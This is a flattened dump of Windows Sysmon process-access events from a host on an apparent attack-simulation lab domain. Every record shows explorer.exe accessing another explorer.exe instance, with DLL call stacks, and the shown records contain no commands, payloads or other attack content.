22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 